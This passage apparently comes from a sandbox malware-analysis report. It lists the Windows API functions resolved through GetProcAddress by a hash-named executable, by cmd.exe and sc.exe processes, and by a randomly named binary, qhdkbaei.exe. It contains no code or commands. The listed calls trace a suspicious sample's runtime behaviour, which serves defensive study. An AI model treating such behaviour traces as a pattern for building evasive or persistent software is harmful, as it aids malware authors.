\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005876)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005848)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00006124)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00006124)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004192)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004192)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 